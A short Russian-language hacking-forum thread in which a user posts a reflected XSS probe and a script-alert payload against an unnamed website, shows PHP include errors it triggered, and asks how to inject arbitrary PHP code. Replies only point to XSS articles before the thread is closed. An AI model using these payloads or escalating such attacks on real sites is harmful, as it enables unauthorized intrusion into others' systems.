![]() |
Помогите разобраться с Xss
Привет парни =)
Помогите мне разобратся с XSS плиз Есть сайт ...... я его протестил прогой RPVS v1.3 она мне выдала XSS уязвимость типа: Код HTML:
xss vulnerability : /index.php?news=6941337<a>%22%27&id=1 |
пример:
первый линк, вместо Код:
6941337<a>%22%27Код:
"><script>alert(/css/)</script> |
Цитата:
http://hackzona.ru/hz.php?name=News&file=article&sid=5005 http://www.cgisecurity.com/articles/dx27.html http://ha.ckers.org/xss.html http://forum.antichat.ru/thread20140.html http://forum.antichat.ru/thread8038.html (с) Robin_Hood (faq) |
Цитата:
Я уже использовал это Код:
"><script>alert(/css/)</script>Код:
Warning: main(http://фылка на сайт/news/news\">.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /srv/www/sites/фылка на сайт/index.php on line 43Код:
Warning: main(): Failed opening 'http://фылка на сайт/news/news\"><script>alert(/fuck/)</script>.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /srv/www/sites/фылка на сайт/index.php on line 43Может тут можно как например при Php including замутить произвольный php кода в страницу? или еще чтонить можно сделать? |
Ссылки на материал по Xss тебе дали...читай на здоровье...
Закрыто... |
| Время: 11:23 |